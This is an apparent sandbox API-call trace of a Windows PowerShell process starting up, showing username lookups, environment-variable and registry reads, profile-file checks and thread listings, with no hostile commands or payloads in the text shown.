	[0791.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1eced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.101] SetErrorMode (uMode=0x1) returned 0x1
	[0791.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed130 | out: lpFileInformation=0x1ed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.102] SetErrorMode (uMode=0x1) returned 0x1
	[0791.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.135] CoTaskMemAlloc (cb=0x804) returned 0x1b3fdc00
	[0791.135] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3fdc00, nSize=0x1ed498 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed498) returned 0x1
	[0792.193] CoTaskMemFree (pv=0x1b3fdc00) 
	[0792.193] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0792.193] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed4d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed4d8) returned 1
	[0792.194] CoTaskMemFree (pv=0x382120) 
	[0792.194] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d92658*="Available", lpRawData=0x2d923e8) returned 1
	[0793.024] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.024] CoTaskMemFree (pv=0x33a4f0) 
	[0793.025] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.025] CoTaskMemFree (pv=0x33a4f0) 
	[0793.027] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.027] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0793.027] CoTaskMemFree (pv=0x33a4f0) 
	[0793.027] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.027] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0793.027] CoTaskMemFree (pv=0x33a4f0) 
	[0793.030] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed4b8 | out: phkResult=0x1ed4b8*=0x37c) returned 0x0
	[0793.030] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed43c, lpData=0x0, lpcbData=0x1ed438*=0x0 | out: lpType=0x1ed43c*=0x1, lpData=0x0, lpcbData=0x1ed438*=0x56) returned 0x0
	[0793.030] CoTaskMemAlloc (cb=0x5a) returned 0x1b407030
	[0793.030] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed40c, lpData=0x1b407030, lpcbData=0x1ed408*=0x56 | out: lpType=0x1ed40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed408*=0x56) returned 0x0
	[0793.030] CoTaskMemFree (pv=0x1b407030) 
	[0793.030] RegCloseKey (hKey=0x37c) returned 0x0
	[0793.032] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.032] CoTaskMemFree (pv=0x33a4f0) 
	[0793.046] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.046] CoTaskMemFree (pv=0x33a4f0) 
	[0793.057] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.058] CoTaskMemFree (pv=0x33a4f0) 
	[0793.058] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.058] CoTaskMemFree (pv=0x33a4f0) 
	[0793.059] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.059] CoTaskMemFree (pv=0x33a4f0) 
	[0793.060] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0793.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.060] CoTaskMemFree (pv=0x33a4f0) 
	[0794.244] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0794.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.244] CoTaskMemFree (pv=0x33a4f0) 
	[0794.245] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0794.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.245] CoTaskMemFree (pv=0x33a4f0) 
	[0796.342] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0796.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.342] CoTaskMemFree (pv=0x33a4f0) 
	[0798.507] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x33a930
	[0798.509] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x33aa40
	[0802.208] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0802.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.208] CoTaskMemFree (pv=0x33ab50) 
	[0802.210] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0802.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.211] CoTaskMemFree (pv=0x33ab50) 
	[0803.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0803.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0803.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0803.107] VirtualQuery (in: lpAddress=0x1eb7c0, lpBuffer=0x1ec680, dwLength=0x30 | out: lpBuffer=0x1ec680*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.114] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed618 | out: phkResult=0x1ed618*=0x2f8) returned 0x0
	[0803.114] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed59c, lpData=0x0, lpcbData=0x1ed598*=0x0 | out: lpType=0x1ed59c*=0x1, lpData=0x0, lpcbData=0x1ed598*=0x56) returned 0x0
	[0803.114] CoTaskMemAlloc (cb=0x5a) returned 0x1b3ef150
	[0803.114] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed56c, lpData=0x1b3ef150, lpcbData=0x1ed568*=0x56 | out: lpType=0x1ed56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed568*=0x56) returned 0x0
	[0803.114] CoTaskMemFree (pv=0x1b3ef150) 
	[0803.114] RegCloseKey (hKey=0x2f8) returned 0x0
	[0803.114] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed618 | out: phkResult=0x1ed618*=0x2f8) returned 0x0
	[0803.114] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed59c, lpData=0x0, lpcbData=0x1ed598*=0x0 | out: lpType=0x1ed59c*=0x1, lpData=0x0, lpcbData=0x1ed598*=0x56) returned 0x0
	[0803.114] CoTaskMemAlloc (cb=0x5a) returned 0x1b3ef150
	[0803.114] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed56c, lpData=0x1b3ef150, lpcbData=0x1ed568*=0x56 | out: lpType=0x1ed56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed568*=0x56) returned 0x0
	[0803.115] CoTaskMemFree (pv=0x1b3ef150) 
	[0803.115] RegCloseKey (hKey=0x2f8) returned 0x0
	[0803.115] CoTaskMemAlloc (cb=0x20c) returned 0x1b3de300
	[0803.115] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3de300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0803.115] CoTaskMemFree (pv=0x1b3de300) 
	[0803.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0803.116] CoTaskMemAlloc (cb=0x20c) returned 0x1b3de300
	[0803.116] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3de300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0803.116] CoTaskMemFree (pv=0x1b3de300) 
	[0803.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0803.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0803.117] SetErrorMode (uMode=0x1) returned 0x1
	[0803.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0803.117] SetErrorMode (uMode=0x1) returned 0x1
	[0803.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0803.117] SetErrorMode (uMode=0x1) returned 0x1
	[0803.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0803.117] SetErrorMode (uMode=0x1) returned 0x1
	[0803.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0803.118] SetErrorMode (uMode=0x1) returned 0x1
	[0803.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0803.118] SetErrorMode (uMode=0x1) returned 0x1
	[0803.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0803.118] SetErrorMode (uMode=0x1) returned 0x1
	[0803.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0803.118] SetErrorMode (uMode=0x1) returned 0x1
	[0803.119] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.119] CoTaskMemFree (pv=0x33ab50) 
	[0803.119] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.120] CoTaskMemFree (pv=0x33ab50) 
	[0803.120] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.120] CoTaskMemFree (pv=0x33ab50) 
	[0803.121] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.121] CoTaskMemFree (pv=0x33ab50) 
	[0803.121] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.122] CoTaskMemFree (pv=0x33ab50) 
	[0803.123] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.123] CoTaskMemFree (pv=0x33ab50) 
	[0803.125] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0803.125] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ed760 | out: lpMode=0x1ed760) returned 1
	[0803.126] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.126] CoTaskMemFree (pv=0x33ab50) 
	[0803.129] SetEvent (hEvent=0x31c) returned 1
	[0803.129] SetEvent (hEvent=0x2f8) returned 1
	[0803.129] SetEvent (hEvent=0x314) returned 1
	[0803.129] SetEvent (hEvent=0x318) returned 1
	[0803.131] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.131] CoTaskMemFree (pv=0x33ab50) 
	[0803.132] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed4b8 | out: phkResult=0x1ed4b8*=0x34c) returned 0x0
	[0803.132] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ed43c, lpData=0x0, lpcbData=0x1ed438*=0x0 | out: lpType=0x1ed43c*=0x0, lpData=0x0, lpcbData=0x1ed438*=0x0) returned 0x2

Thread:
	id = 408
	os_tid = 0x104c


Thread:
	id = 410
	os_tid = 0x1054


Thread:
	id = 1064
	os_tid = 0x1424


Thread:
	id = 1074
	os_tid = 0x1878


Thread:
	id = 1094
	os_tid = 0x1640


Thread:
	id = 1114
	os_tid = 0x1648


Thread:
	id = 1122
	os_tid = 0x18b4

	[0570.303] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.736] RegCloseKey (hKey=0x2f8) returned 0x0
	[0642.736] RegCloseKey (hKey=0x300) returned 0x0
	[0642.736] RegCloseKey (hKey=0x2fc) returned 0x0
	[0750.440] LocalFree (hMem=0x3472e0) returned 0x0
	[0750.440] RegCloseKey (hKey=0x310) returned 0x0
	[0750.441] LocalFree (hMem=0x347290) returned 0x0
	[0750.441] CloseHandle (hObject=0x2f8) returned 1
	[0750.441] CloseHandle (hObject=0x13) returned 1
	[0750.442] CloseHandle (hObject=0xf) returned 1
	[0761.296] RegCloseKey (hKey=0x2f8) returned 0x0
	[0783.368] RegCloseKey (hKey=0x2f8) returned 0x0
	[0783.368] RegCloseKey (hKey=0x310) returned 0x0
	[0795.417] RegCloseKey (hKey=0x384) returned 0x0
	[0795.417] RegCloseKey (hKey=0x380) returned 0x0
	[0795.417] RegCloseKey (hKey=0x35c) returned 0x0
	[0795.417] RegCloseKey (hKey=0x398) returned 0x0
	[0795.418] RegCloseKey (hKey=0x378) returned 0x0
	[0795.418] RegCloseKey (hKey=0x374) returned 0x0
	[0795.418] RegCloseKey (hKey=0x370) returned 0x0
	[0795.418] RegCloseKey (hKey=0x36c) returned 0x0
	[0795.419] RegCloseKey (hKey=0x368) returned 0x0
	[0795.419] RegCloseKey (hKey=0x364) returned 0x0
	[0795.419] RegCloseKey (hKey=0x360) returned 0x0
	[0795.420] RegCloseKey (hKey=0x338) returned 0x0
	[0795.420] RegCloseKey (hKey=0x394) returned 0x0
	[0795.420] RegCloseKey (hKey=0x390) returned 0x0
	[0795.420] RegCloseKey (hKey=0x358) returned 0x0
	[0795.421] RegCloseKey (hKey=0x354) returned 0x0
	[0795.421] RegCloseKey (hKey=0x350) returned 0x0
	[0795.421] RegCloseKey (hKey=0x34c) returned 0x0
	[0795.421] RegCloseKey (hKey=0x348) returned 0x0
	[0795.422] RegCloseKey (hKey=0x344) returned 0x0
	[0795.422] RegCloseKey (hKey=0x340) returned 0x0
	[0795.422] RegCloseKey (hKey=0x33c) returned 0x0
	[0795.422] RegCloseKey (hKey=0x38c) returned 0x0
	[0795.423] RegCloseKey (hKey=0x32c) returned 0x0
	[0795.423] RegCloseKey (hKey=0x328) returned 0x0
	[0795.423] RegCloseKey (hKey=0x324) returned 0x0
	[0795.424] RegCloseKey (hKey=0x320) returned 0x0
	[0795.424] RegCloseKey (hKey=0x31c) returned 0x0
	[0795.424] RegCloseKey (hKey=0x318) returned 0x0
	[0795.424] RegCloseKey (hKey=0x314) returned 0x0
	[0795.425] RegCloseKey (hKey=0x2f8) returned 0x0
	[0795.425] RegCloseKey (hKey=0x388) returned 0x0
	[0815.178] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1187
	os_tid = 0x1828


Thread:
	id = 1701
	os_tid = 0x23cc

	[0803.939] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0803.944] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0803.949] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.949] CoTaskMemFree (pv=0x33ab50) 
	[0803.951] VirtualQuery (in: lpAddress=0x1c68d6e0, lpBuffer=0x1c68e5a0, dwLength=0x30 | out: lpBuffer=0x1c68e5a0*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.954] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.955] CoTaskMemFree (pv=0x33ab50) 
	[0803.958] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.958] CoTaskMemFree (pv=0x33ab50) 
	[0803.962] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.962] CoTaskMemFree (pv=0x33ab50) 
	[0803.980] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0803.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.096] CoTaskMemFree (pv=0x33ab50) 
	[0805.098] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.099] CoTaskMemFree (pv=0x33ab50) 
	[0805.100] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.100] CoTaskMemFree (pv=0x33ab50) 
	[0805.105] VirtualQuery (in: lpAddress=0x1c68d990, lpBuffer=0x1c68e850, dwLength=0x30 | out: lpBuffer=0x1c68e850*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.106] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.106] CoTaskMemFree (pv=0x33ab50) 
	[0805.109] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.109] CoTaskMemFree (pv=0x33ab50) 
	[0805.109] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.109] CoTaskMemFree (pv=0x33ab50) 
	[0805.110] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.111] CoTaskMemFree (pv=0x33ab50) 
	[0805.115] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0805.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
